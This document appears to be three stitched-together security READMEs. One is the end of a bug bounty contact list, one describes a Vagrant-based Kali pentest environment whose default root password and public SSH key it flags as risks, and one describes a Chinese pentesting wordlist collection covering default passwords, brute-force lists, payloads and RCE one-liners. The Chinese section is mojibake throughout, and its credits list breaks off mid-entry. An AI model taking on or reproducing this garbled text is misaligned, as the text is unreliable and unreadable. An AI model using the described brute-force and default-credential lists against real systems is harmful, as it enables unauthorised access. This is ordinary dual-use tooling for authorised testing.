[CircleCI](mailto:[email protected]) - [Cisco](http://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html#roosfassv) - [Clojars](mailto:[email protected]) - [CloudFlare](https://hackerone.com/cloudflare) - [Cobalt](https://cobalt.io/cobalt) - [Code Climate](mailto:[email protected]) - [CodeIgniter](https://hackerone.com/codeigniter) - [CodePen](https://bugcrowd.com/codepen) - [Coin Republic](https://cobalt.io/coin-republic) - [Coin.Space](https://hackerone.com/coinspace) - [Coinage](https://cobalt.io/coinage) - [Coinbase](https://hackerone.com/coinbase) - [CoinDaddy](https://cobalt.io/coindaddy) - [Coinkite](mailto:[email protected]?subject=%5BVulnerability%5D%20-%20) - [Coinport](https://cobalt.io/coinport) - [coins.ph](https://cobalt.io/coins-ph) - [Cointrader.net](https://cobalt.io/cointrader-net) - [Coinvoy](https://cobalt.io/coinvoy) - [Compose](mailto:[email protected]) - [concrete5](https://hackerone.com/concrete5) - [Constant Contact](mailto:[email protected]) - [Counterparty](https://cobalt.io/counterparty) - [Coupa](mailto:[email protected]) - [Coursera](https://hackerone.com/coursera) - [cPanel](mailto:[email protected]) - [cPaperless](mailto:[email protected]) - [Crix.io](https://cobalt.io/crixio) - [CrowdShield](https://crowdshield.com/bug-bounty-list.php?bug_bounty_program=crowdshield) - [Cryptocat](https://github.com/cryptocat/cryptocat/issues) - [Cupcake](mailto:[email protected]) - [CustomerInsight](mailto:[email protected]) - [Cylance](https://hackerone.com/cylance) - [Dato Capital](mailto:security%40datocapital.com) - [Detectify](mailto:[email protected]) - [DigitalOcean](mailto:[email protected]) - [DigitalSellz](https://hackerone.com/digitalsellz) - [Django](https://hackerone.com/django) - [Doorkeeper](mailto:[email protected]) - [DoSomething](https://cobalt.io/dosomething) - [DPD](mailto:[email protected]) - [Dropbox](https://hackerone.com/dropbox) - [Dropbox Acquisitions](https://hackerone.com/dropbox-acquisitions) - [Drupal](https://www.drupal.org/node/101494) - [eBay](http://pages.ebay.com/securitycenter/Researchers.html) - [Eclipse](mailto:[email protected]) - [EMC](mailto:[email protected]) - [Enano](mailto:[email protected]) - [Engine Yard](mailto:[email protected]) - [Envoy](https://hackerone.com/envoy) - [Eobot](https://cobalt.io/eobot) - [EthnoHub](mailto:[email protected]) - [Etsy](https://www.etsy.com/bounty) - [EVE](mailto:[email protected]) - [Event Espresso](http://eventespresso.com/report-a-security-vulnerability) - [Evernote](mailto:[email protected]) - [Expatistan](mailto:[email protected]) - [ExpressionEngine](https://hackerone.com/expressionengine) - [Ezbob](https://cobalt.io/ezbob) - [Facebook](https://www.facebook.com/whitehat) - [Faceless](https://hackerone.com/faceless) - [Factlink](https://hackerone.com/factlink) - [FanFootage](https://hackerone.com/fanfootage) - [FastSlots](https://cobalt.io/fastslots) - [Flash](https://hackerone.com/flash) - [Flood](mailto:[email protected]) - [Flow Dock](mailto:[email protected]) - [Flox](https://hackerone.com/flox) - [Fluxiom](mailto:[email protected]) - [Fog Creek](http://www.fogcreek.com/contact) - [FormAssembly](mailto:[email protected]) - [Founder Bliss](https://cobalt.io/founder-bliss) - [Foursquare](mailto:[email protected]) - [Freelancer](mailto:[email protected]) - [Gallery](mailto:[email protected]) - [Gamma](mailto:[email protected]) - [Gemfury](mailto:[email protected]) - [General Motors](https://hackerone.com/gm) - [GhostMail](https://hackerone.com/gmguys) - [GitHub](https://bounty.github.com/submit-a-vulnerability.html) - [GitLab](https://hackerone.com/gitlab) - [GlassWire](https://hackerone.com/glasswire) - [Gliph](mailto:[email protected]) - [GlobaLeaks](https://hackerone.com/globaleaks) - [Google PRP](mailto:[email protected]) - [Google VRP](https://www.google.com/about/appsecurity/reward-program/index.html) - [Gratipay](https://hackerone.com/gratipay) - [GreenAddress](https://cobalt.io/greenaddress) - [Greenhouse.io](https://hackerone.com/greenhouse) - [Grok Learning](mailto:[email protected]) - [HackerOne](https://hackerone.com/security) - [Harmony](mailto:[email protected]) - [Heroku](https://bugcrowd.com/heroku) - [Hex-Rays](mailto:[email protected]) - [Hive Wallet](https://cobalt.io/hive-wallet) - [Hootsuite](mailto:[email protected]) - [HTC](mailto:[email protected]) - [Huawei](mailto:[email protected]) - [Hubdia](https://hackerone.com/hubdia) - [Humble Bundle](https://bugcrowd.com/humblebundle) - [Ian Dunn](https://hackerone.com/iandunn-projects) - [IBM](https://www.ibm.com/scripts/contact/contact/us/en/security_vulnerabilities) - [ICEcoder](https://bugcrowd.com/icecoder) - [Iconfinder](mailto:[email protected]) - [Ifixit](mailto:[email protected]) - [Imgur](https://hackerone.com/imgur) - [ImpressPages](https://cobalt.io/impresspages) - [Indeed](https://bugcrowd.com/indeed) - [Independent Reserve](https://cobalt.io/independent-reserve) - [Informatica](https://hackerone.com/informatica) - [IntegraXor](http://www.integraxor.com/support.html) - [Internetwache](mailto:[email protected]) - [InVision](https://hackerone.com/invision) - [IRCCloud](https://hackerone.com/irccloud) - [itBit Exchange](https://hackerone.com/itbit) - [ITRP](mailto:[email protected]) - [joola.io](https://hackerone.com/joola-io) - [Joomla](http://vel.joomla.org/submit-vel) - [JRuby](mailto:[email protected]) - [jsDelivr](https://hackerone.com/jsdelivr) - [Juniper](mailto:[email protected]) - [Kadira](https://hackerone.com/kadira) - [Kaneva](mailto:[email protected]) - [Kayako](http://my.kayako.com/Tickets/Submit) - [Kenna](https://bugcrowd.com/riskio) - [Keybase](https://hackerone.com/keybase) - [Khan Academy](https://hackerone.com/khanacademy) - [Kraken](mailto:[email protected]) - [Lancor Income](https://cobalt.io/lancor-income) - [LastPass](mailto:[email protected]) - [LaunchKey](mailto:[email protected]) - [Lean Testing](https://hackerone.com/leantesting) - [leetfiles](https://hackerone.com/leetfiles) - [Librato](mailto:[email protected]) - [LibSass](https://hackerone.com/libsass) - [Liferay](mailto:[email protected]) - [Line](https://bugbounty.linecorp.com/en/) - [LinkedIn](mailto:[email protected]) - [LiveEnsure](http://www.liveensure.com/contact.php) - [LocalBitcoins](https://cobalt.io/localbitcoins) - [Localize](https://hackerone.com/localize) - [Logentries](mailto:[email protected]) - [Lookout](mailto:[email protected]) - [Magento](mailto:[email protected]) - [MAGIX](mailto:[email protected]) - [Mahara](mailto:[email protected]) - [MaiCoin](https://cobalt.io/maicoin) - [Mail.Ru](https://hackerone.com/mailru) - [Mailbird](https://cobalt.io/mailbird) - [MailChimp](http://mailchimp.com/about/security-response/) - [ManageBGL](https://cobalt.io/managebgl) - [ManageWP](mailto:[email protected]) - [MapLogin](https://hackerone.com/maplogin) - [Marktplatts](https://hackerone.com/marktplaats) - [Mavenlink](https://hackerone.com/mavenlink) - [Maximum](https://hackerone.com/maximum) - [MCProHosting](https://bugcrowd.com/mcprohostings) - [MEGA](mailto:[email protected]) - [Mercury](https://cobalt.io/mercury) - [Meteor](https://hackerone.com/meteor) - [meXBT](https://cobalt.io/mexbt) - [Microsoft](mailto:[email protected]) - [Mimecast](mailto:[email protected]) - [Mobile Vikings](https://hackerone.com/mobilevikings) - [Modus CSR](mailto:[email protected]) - [MoneyBird](mailto:[email protected]) - [MoneyStream](https://hackerone.com/moneystream) - [Moodle](mailto:[email protected]) - [Motorola Solutions](mailto:[email protected]) - [Mozilla](https://www.mozilla.org/en-US/security/bug-bounty/) - [mynxt.info](https://cobalt.io/mynxt-info) - [Natures Organics](mailto:[email protected]) - [NCSC](mailto:[email protected]) - [Nearby Live](https://hackerone.com/nearby) - [Nest](mailto:[email protected]) - [Netflix](mailto:[email protected]) - [Nexmo](https://cobalt.io/nexmo) - [Nginx](https://hackerone.com/ibb-nginx) - [Nitrous](mailto:[email protected]) - [Nokia Networks](mailto:[email protected]) - [NoPass](https://cobalt.io/nopass) - [NZRS](mailto:[email protected]) - [Offensive Security](mailto:[email protected]) - [ok.ru](https://hackerone.com/ok) - [OKCoin](https://cobalt.io/okcoin) - [OkCupid](https://hackerone.com/okcupid) - [Olark](mailto:[email protected]) - [Opal Cryptocurrency](https://cobalt.io/opal-cryptocurrency) - [Openfolio](https://hackerone.com/openfolio) - [OpenSSL](https://hackerone.com/ibb-openssl) - [OpenStack](https://security.openstack.org/#how-to-report-security-issues-to-openstack) - [OpenText](mailto:[email protected]) - [Opera](https://bugs.opera.com/wizarddesktop) - [Optimizely](https://cobalt.io/optimizely) - [Oracle](mailto:[email protected]) - [ownCloud](https://hackerone.com/owncloud) - [PagerDuty](mailto:[email protected]) - [Panasonic Avionics](https://hackerone.com/panasonic-aero) - [Pantheon](https://bugcrowd.com/pantheon) - [Panzura](mailto:[email protected]) - [Paragon Initiative Enterprises](https://hackerone.com/paragonie) - [Paychoice](mailto:[email protected]) - [PayMill](mailto:[email protected]) - [PayPal](mailto:https://www.paypal.com/bugbounty/register) - [Perl](https://hackerone.com/ibb-perl) - [Phabricator](https://hackerone.com/phabricator) - [PHP](https://bugs.php.net/report.php) - [Pidgin](mailto:[email protected]) - [PikaPay](mailto:[email protected]) - [PinoyHackNews](mailto:[email protected]) - [Pinterest](https://bugcrowd.com/pinterest) - [Piwik Open Source Analytics](https://cobalt.io/piwik-open-source-analytics) - [Plone](mailto:[email protected]) - [Pocket](mailto:[email protected]) - [Poloniex](https://cobalt.io/poloniex) - [Postmark](https://wildbit.wufoo.com/forms/wildbit-security-response) - [Prezi](mailto:[email protected]) - [Projectplace](https://hackerone.com/projectplace) - [PullReview](mailto:[email protected]) - [Puppet labs](mailto:[email protected]) - [PureVPN](https://bugcrowd.com/purevpn) - [Python](mailto:[email protected]) - [QIWI](https://hackerone.com/qiwi) - [Quadriga CX](https://cobalt.io/quadriga-cx) - [QuickBT](https://cobalt.io/quickbt) - [Rackspace](mailto:[email protected]) - [Rdbhost_service](https://cobalt.io/rdbhost-service) - [Red Hat](mailto:[email protected]) - [Reddit](mailto:[email protected]) - [Relaso](mailto:[email protected]) - [RelateIQ](mailto:[email protected]) - [Release Wire](http://www.releasewire.com/about/contact) - [Respondly](https://hackerone.com/respondly) - [Revive Adserver](https://hackerone.com/revive_adserver) - [Ribose](https://www.ribose.com/feedbacks/security) - [Ripio](https://cobalt.io/ripio) - [Ripple](mailto:[email protected]) - [Riskalyze](mailto:[email protected]) - [Romit](https://hackerone.com/romit) - [Ruby](mailto:[email protected]) - [Ruby on Rails](https://hackerone.com/rails) - [Salesforce](mailto:[email protected]) - [Samsung TV](https://samsungtvbounty.com/ReportBug.aspx) - [Sandbox Escape](https://hackerone.com/sandbox) - [SAP](mailto:[email protected]) - [Schuberg Philis](mailto:[email protected]) - [Scorpion Software](mailto:[email protected]) - [Secret](https://hackerone.com/secret) - [Secure Works](mailto:[email protected]) - [Sellfy](http://docs.sellfy.com/contact) - [ServiceRocket](https://bugcrowd.com/servicerocket) - [ShareLaTeX](mailto:[email protected]) - [Sherpany](https://cobalt.io/sherpany) - [Shopify](https://hackerone.com/shopify) - [Sifter](mailto:[email protected]?subject=%27Security%20Vulnerability%20Report%27) - [Silent Circle](https://bugcrowd.com/silentcircle) - [Simple](https://bugcrowd.com/simple) - [SiteGround](mailto:[email protected]) - [Skoodat](mailto:[email protected]) - [Skrill](https://cobalt.io/skrill) - [Slack](https://hackerone.com/slack) - [Snapchat](https://hackerone.com/snapchat) - [Snappy](mailto:[email protected]) - [Sonatype](mailto:[email protected]) - [Sony](https://secure.sony.net/form) - [SoundCloud](https://scsecurity.freshdesk.com/support/tickets/new) - [SpectroCoin](https://cobalt.io/spectrocoin) - [Spendbitcoins](https://cobalt.io/spendbitcoins) - [SplashID](https://bugcrowd.com/splashid) - [Splitwise](mailto:[email protected]) - [Spotify](mailto:[email protected]) - [Sprout Social](mailto:[email protected]) - [Square](https://hackerone.com/square) - [Square Open Source](https://hackerone.com/square-open-source) - [StatusPage](https://bugcrowd.com/sunrise) - [StopTheHacker](https://hackerone.com/stopthehacker) - [Subledger](https://cobalt.io/subledger) - [Subrosa](https://cobalt.io/subrosa) - [Sucuri](https://hackerone.com/sucuri) - [Symantec](mailto:[email protected]) - [Taptalk](https://hackerone.com/taptalk) - [Tarsnap](mailto:[email protected]) - [TeamUnify](mailto:[email protected]) - [Tele2](mailto:[email protected]) - [Telekom](mailto:[email protected]?subject=bug_bounty) - [The Internet](https://hackerone.com/internet) - [The Mastercoin Foundation](https://cobalt.io/the-mastercoin-foundation) - [ThisData](https://hackerone.com/thisdata) - [TimeTrex](https://cobalt.io/timetrex) - [ToyTalk](https://hackerone.com/toytalk) - [Trello](https://hackerone.com/trello) - [Tuenti](http://corporate.tuenti.com/en/contact/security) - [Twilio](https://bugcrowd.com/twilio) - [Twitch](mailto:[email protected]) - [Twitter](https://hackerone.com/twitter) - [Uber](mailto:[email protected]) - [Ubiquiti Networks](https://hackerone.com/ubnt) - [Unitag](mailto:[email protected]) - [Urban Dictionary](https://hackerone.com/urbandictionary) - [Uzbey](https://hackerone.com/uzbey) - [Valve Software](mailto:[email protected]) - [VCE](mailto:[email protected]) - [Venmo](mailto:[email protected]) - [Version Cake](https://hackerone.com/versioncake) - [Viadeo](mailto:[email protected]) - [Vimeo](https://hackerone.com/vimeo) - [VK.com](https://hackerone.com/vkcom) - [Volusion](https://bugcrowd.com/volusion) - [VPNSox](https://cobalt.io/vpnsox) - [vulners.com](https://hackerone.com/vulnerscom) - [Vultr](https://www.vultr.com/bug-bounty/) - [Webconverger](mailto:[email protected]) - [Websecurify](http://campaigns.websecurify.com/money-for-bugs/#contact) - [Weebly](https://cobalt.io/weebly) - [WePay](https://hackerone.com/wepay) - [Whisper](https://hackerone.com/whisper) - [WHMCS](https://bugcrowd.com/whmcs) - [Windthorst ISD](http://www.windthorstisd.net/BugReport.cfm) - [withinsecurity](https://hackerone.com/withinsecurity) - [WizeHive](mailto:[email protected]) - [WordPoints](https://hackerone.com/wordpoints) - [Wordware](https://cobalt.io/wordware) - [WP API](https://hackerone.com/wp-api) - [Xen Project](mailto:[email protected]) - [Xmarks](mailto:[email protected]) - [Yahoo](https://hackerone.com/yahoo) - [Yandex](https://yandex.com/bugbounty/report) - [Yanomo](mailto:[email protected]) - [Yesware](mailto:[email protected]) - [Zapier](mailto:[email protected]) - [Zaption](https://hackerone.com/zaption) - [ZenCash](mailto:[email protected]) - [Zendesk](https://hackerone.com/zendesk) - [Zetetic](mailto:[email protected]) - [Ziggo](mailto:[email protected]) - [Zimbra](mailto:[email protected]) - [Zoho](https://bugbounty.zoho.com/bb/info) - [Zomato](https://hackerone.com/zomato) - [Zopim](https://hackerone.com/zopim) - [Zynga](mailto:[email protected]) ## License [![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](https://creativecommons.org/publicdomain/zero/1.0/) To the extent possible under law, [Dheeraj Joshi](https://github.com/djadmin) has waived all copyright and related or neighboring rights to this work.
# Pentest Environment Deployer | [![Build Status](https://travis-ci.org/Sliim/pentest-env.svg?branch=master)](https://travis-ci.org/Sliim/pentest-env) This repo provides an easy way to deploy a clean and customized pentesting environment with Kali linux using vagrant and virtualbox. ## Requirements I assume you are familiar with virtualbox and vagrant. - https://www.virtualbox.org/ - http://www.vagrantup.com/ Latest `pentest-env` release is tested with: - Virtualbox (6.0.4) - Vagrant (2.2.3) ## Current box ### Kali 2018.1 | Box | SHA256 | |------------------ | -----------------------------------------------------------------| | [Kali 2018.1](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-amd64) | `407b01c550e1f230fc238d12d91da899644bec2cac76a1202d7bab2f9d6cbefd` | | [Kali 2018.1 Light](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-light-amd64) | `1f58f62417219ce8fe7d5f0b72dc3a8e0c13c019e7f485e10d27a0f1f096e266` | | [Kali 2018.1 KDE](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-kde-amd64) | `0f44327c2606ead670679254f27945c82eb7cc2966c4a4f1d3137160dad07fe3` | | [Kali 2018.1 LXDE](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-lxde-amd64) | `f3765b918aec03024c2657fc75090c540d95602cd90c0ab8835b4c0a0f1da23a` | | [Kali 2018.1 Xfce](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-xfce-amd64) | `eec6b371743467244d3f4f1032c9dc576a1ce482a32ad18b8605bd3013e142a0` | | [Kali 2018.1 Mate](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-mate-amd64) | `221f1bf6936b560d8980290c2af0702f1e705798eb4ef51acc144e36c89fe51c` | | [Kali 2018.1 E17](https://app.vagrantup.com/Sliim/boxes/kali-2018.1-e17-amd64) | `0466384e8338e269b441b5f2872c28888528d244a0d31b73c7fb9d15d4f1bd0d` | See the [documentation](docs/About-boxes.md) page about boxes for more details. See also others [available instances](docs/Instances.md). ## Getting started To get started with `pentest-env`, clone this repository and run `vagrant up` inside the directory. This will download and run the Kali instance. You can customize, add targets, create new targets etc.. inside `pentest-env`. Some examples are available in the `examples/` directory, to use one simply set the `PENTESTRC` environment variable: ``` > PENTESTRC=examples/ctf.pentestrc vagrant status Current machine states: kali running (virtualbox) metasploitable2 not created (virtualbox) primer not created (virtualbox) This environment represents multiple VMs. The VMs are all listed above with their current state. For more information about a specific VM, run `vagrant status NAME`. ``` For more details, visit the [documentation](docs/) pages: 1. [Installation](docs/Installation.md) 2. [Usage](docs/Usage.md) 3. [Docker](docs/Docker.md) 4. [Openstack](docs/Openstack.md) 5. [Customizations](docs/Customizations.md) 6. [Instances](docs/Instances.md) 7. [Targets](docs/Targets.md) 8. [Write custom instances and targets](docs/Custom-instances.md) 9. [Debugging](docs/Debugging.md) 9. [Security](docs/Security.md) 10. [About boxes](docs/About-boxes.md) 11. [Known issues](docs/Known-issues.md) #### Some configuration examples: 1. [Configure Kali linux with Tor & proxychains](docs/examples/Tor-proxy.md) 2. [Configure Kali linux with Whonix gateway](docs/examples/Whonix.md) 3. [Faraday cscan against metasploitable 2 & 3 targets](docs/examples/Cscan-msfrpc.md) 4. [Configure a Teamserver](docs/examples/Teamserver.md) #### Target examples: 1. [Basic Chef environment](docs/examples/Chef-environment.md) 2. [Simple & insecure Kubernetes cluster](docs/examples/K8s-cluster.md) ## About Security #### verify checksums It's recommended to check downloaded box files with provided checksums (SHA256). See https://raw.githubusercontent.com/Sliim/pentest-env/master/checksums.txt for checksums list. #### sshd is running Provided boxes run the `sshd` service. So if you plan to run the Kali linux with a Bridged interface, default setup can be dangerous! - `root` password of kali is `toor`. - SSH private key is not private! Anyone can use this [key](https://github.com/Sliim/pentest-env/blob/master/ssh-keys/pentest-env) to connect to your instance. See the [secure the environment](docs/Security.md) page to automatically change these defaults values. #### Shared folders symlinks I recommend to disable `SharedFoldersEnableSymlinksCreate` which are enabled by default by vagrant. More details and source in the [Security/Disable SharedFoldersEnableSymlinksCreate](docs/Security.md#disable-sharedfoldersenablesymlinkscreate) section. ## Related projects Here is some projects you can build and integrate easily with pentest-env. - Metasploitable3 - https://github.com/rapid7/metasploitable3/ - DetectionLab - https://github.com/clong/DetectionLab - DanderSpritz-Lab - https://github.com/francisck/DanderSpritz_lab ## License See COPYING file
# Dictionary-Of-Pentesting ## ็ฎ€ไป‹ ๆ”ถ้›†ไธ€ไบ›ๅธธ็”จ็š„ๅญ—ๅ…ธ๏ผŒ็”จไบŽๆธ—้€ๆต‹่ฏ•ใ€SRCๆผๆดžๆŒ–ๆŽ˜ใ€็ˆ†็ ดใ€Fuzzing็ญ‰ๅฎžๆˆ˜ไธญใ€‚ ๆ”ถ้›†ไปฅๅฎž็”จไธบๅŽŸๅˆ™ใ€‚็›ฎๅ‰ไธป่ฆๅˆ†็ฑปๆœ‰่ฎค่ฏ็ฑปใ€ๆ–‡ไปถ่ทฏๅพ„็ฑปใ€็ซฏๅฃ็ฑปใ€ๅŸŸๅ็ฑปใ€ๆ— ็บฟ็ฑปใ€ๆญฃๅˆ™็ฑปใ€‚ ๆถ‰ๅŠ็š„ๅ†…ๅฎนๅŒ…ๅซ่ฎพๅค‡้ป˜่ฎคๅฏ†็ ใ€ๆ–‡ไปถ่ทฏๅพ„ใ€้€š็”จ้ป˜่ฎคๅฏ†็ ใ€HTTPๅ‚ๆ•ฐใ€HTTP่ฏทๆฑ‚ๅคดใ€ๆญฃๅˆ™ใ€ๅบ”็”จๆœๅŠก้ป˜่ฎคๅฏ†็ ใ€ๅญๅŸŸๅใ€็”จๆˆทๅใ€็ณป็ปŸๅฏ†็ ใ€Wifiๅฏ†็ ็ญ‰ใ€‚ ่ฏฅ้กน็›ฎ่ฎกๅˆ’ๆŒ็ปญๆ”ถ้›†๏ผŒไนŸๆฌข่ฟŽๆ„Ÿๅ…ด่ถฃ็š„ๅคงไฝฌไธ€่ตทๆฅๅฎŒๅ–„ใ€‚ๅฏ็›ดๆŽฅๆไบคPR๏ผŒไนŸๅฏไปฅๆๅปบ่ฎฎๅˆฐissueใ€‚ ## ๆ›ดๆ–ฐ่ฎฐๅฝ• **2020.11.23** 1. ๅขžๅŠ ctfๅญ—ๅ…ธใ€‚ 2. ๅขžๅŠ ๆ‘„ๅƒrtsp้ป˜่ฎค่ทฏๅพ„ๅ’Œ้ป˜่ฎค็”จๆˆทๅๅ’Œๅฏ†็  **2020.11.14** 1. ๅขžๅŠ 1ไธชics ้ป˜่ฎคๅฏ†็ ๅญ—ๅ…ธ 2. ๅขžๅŠ 1ไธช่ฎพๅค‡้ป˜่ฎคๅฏ†็ ๅญ—ๅ…ธ๏ผˆ3400ไฝ™ๆก๏ผ‰ **2020.11.04** 1. ๅขžๅŠ  Wordpress BruteForc List **2020.11.03** 1. ๅขžๅŠ ๅ‡ ไธช้ป˜่ฎคๅฃไปค **2020.10.15** 1. ๅขžๅŠ ไธ€ไบ›payload **2020.09.30** 1. ๅขžๅŠ ๅธธ่งๅฏไปฅRCE็š„็ซฏๅฃ **2020.09.29** 1. bugbounty oneliner rce 2. ไธ€ไบ›้ป˜่ฎค่ทฏๅพ„ 3. top 100k ๅฏ†็ ๅญ—ๅ…ธ 4. top 5k ็”จๆˆทๅๅญ—ๅ…ธ 5. ไธ€ไบ›ไปฃ็ ๅฎก่ฎกๆญฃๅˆ™่กจ่พพๅผ **2020.09.27** 1. ๅขžๅŠ cms่ฏ†ๅˆซๆŒ‡็บน่ง„ๅˆ™้›†๏ผŒๅŒ…ๅซ fofa/Wappalyzer/WEBEYE/webไธญ้—ดไปถ/ๅผ€ๅ‘่ฏญ่จ€ ็ญ‰ไผ—ๅคšๆŒ‡็บนๅบ“ๅ†…ๅฎน **2020.09.22** 1. ไฟฎๆ”นswaggerๅญ—ๅ…ธ๏ผŒๆทปๅŠ 5ๆก่ทฏๅพ„ **2020.09.21** 1. ๅขžๅŠ 3็ง็ฑปๅž‹ๅฏ†็ ๅญ—ๅ…ธ๏ผŒๆ‹ผ้Ÿณใ€็บฏๆ•ฐๅญ—ใ€้”ฎ็›˜ๅฏ†็ ๅญ—ๅ…ธ 2. ๅขžๅŠ scada ้ป˜่ฎคๅฏ†็ ๏ผŒ็กฌ็ผ–็ ็ญ‰ๅˆ—่กจ **2020.09.18** 1. ๅขžๅŠ 11k+็”จๆˆทๅๅฏ†็ ็ป„ๅˆ **2020.09.17** 1. ๅขžๅŠ actionๅŽ็ผ€ top 100 2. javascript ไธญonไบ‹ไปถๅˆ—่กจ 3. URL 16่ฟ›ๅˆถfuzz **2020.09.15** 1. ๅขžๅŠ XXE bruteforce wordlist 2. ๅขžๅŠ sqlๅค‡ไปฝๆ–‡ไปถๅๅญ—ๅ…ธ 3. ๅˆ ้™ค้‡ๅค็š„spring bootๅ†…ๅฎน **2020.09.10** 1. ๅขžๅŠ ่‡ชๅทฑๆ”ถ้›†็š„webservicesๅ†…ๅฎนใ€‚ๅŒ…ๅซwebservices็›ฎๅฝ•๏ผŒๆ–‡ไปถๅ๏ผŒๆ‹“ๅฑ•ๅใ€‚ๅŽ็ปญ่ฎกๅˆ’ๅขžๅŠ ๅญ˜ๅœจๆผๆดžwebservices่ทฏๅพ„ๅ†…ๅฎน 2. readmeไธญๅขžๅŠ ๆ›ดๆ–ฐๅŽ†ๅฒ **2020.09.09** 1. ๅขžๅŠ weblogic่ทฏๅพ„ 2. ๅขžๅŠ swagger่ทฏๅพ„ 3. ๅขžๅŠ graphql่ทฏๅพ„ 4. ๅขžๅŠ spring-boot่ทฏๅพ„ 5. ๅŽปๆŽ‰device/default_password_list.txtๆ–‡ไปถไธญ็š„็ฉบ่กŒ **2020.09.08** 1. ๆ›ดๆ–ฐjsFileDict.txtๅญ—ๅ…ธ๏ผŒๅขžๅŠ 4ไธชjsๆ–‡ไปถๅ **2020.09.07** 1. ๆทปๅŠ ็ป•่ฟ‡ip้™ๅˆถ็š„http่ฏทๆฑ‚ๆŠ• 2. ไฟฎๆ”นreadme.md **2020.08.29** 1. ๅขžๅŠ ๅธธ่ง่ฎพๅค‡ใ€ๅฎ‰ๅ…จไบงๅ“้ป˜่ฎคๅฃไปค 2. ๅขžๅŠ ไธ€่กŒๅ‘ฝไปค็š„BugBounty tips 3. ๅขžๅŠ ไธคๅค„ๅ‚ๆ•ฐๅญ—ๅ…ธ 4. ๅขžๅŠ bruteforce-lists็š„ๅญ—ๅ…ธ 5. Readme ๆ–‡ไปถๅขžๅŠ ๆฅๆบใ€‚้€ๆธๅฎŒๅ–„ใ€‚ **2020.08.28** 1. ๅขžๅŠ api่ทฏๅพ„ 2. ๅขžๅŠ jsๆ–‡ไปถ่ทฏๅพ„ 3. ๅขžๅŠ http่ฏทๆฑ‚ๅ‚ๆ•ฐ 4. ๅขžๅŠ http่ฏทๆฑ‚ๅ‚ๆ•ฐๅ€ผ **2020.08.27** 1. ๅˆ ้™คไธ€ไบ›ๅคšไฝ™ๆ–‡ไปถ 2. ็ฒพ็ฎ€Filesไธ‹็š„dict็š„ๅฑ‚็บง 3. ๅขžๅŠ DirBusterๅญ—ๅ…ธ 4. ๅขžๅŠ spring boot actuatorๅญ—ๅ…ธ **2020.08.26** ้ฆ–ๆฌกๆไบค ## todo - [ ] ๆ–‡ไปถๅๅญ—ใ€็›ฎๅฝ•้ฃŽๆ ผ็ปŸไธ€ๆ•ด็† - [ ] ่‹ฑๆ–‡็‰ˆๆœฌ็š„readme - [x] ็ฝ‘็ซ™ๆŒ‡็บน่ฏ†ๅˆซ็‰นๅพๆ”ถ้›† - [x] ๅ…ถไป–ๅพ…ๆทปๅŠ  ## ๆฅๆบ&่‡ด่ฐข๏ผˆๆŽ’ๅไธๅˆ†ๅ…ˆๅŽใ€‚็›ฎๅ‰่ฟ˜ไธๅ…จ๏ผŒไผš้™†็ปญๅฎŒๅ–„๏ผ‰ ่ฏฅ้กน็›ฎๅ†…ๅฎนๅ‡ๆฅๆบไบŽ็ฝ‘็ปœๆˆ–่‡ชๅทฑๆ•ด็†๏ผŒๆ„Ÿ่ฐขๅ„ไฝๅคงไฝฌไปฌ็š„ๅ…ฑไบซ็ฒพ็ฅžๅ’Œ่พ›่‹ฆไป˜ๅ‡บ~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * 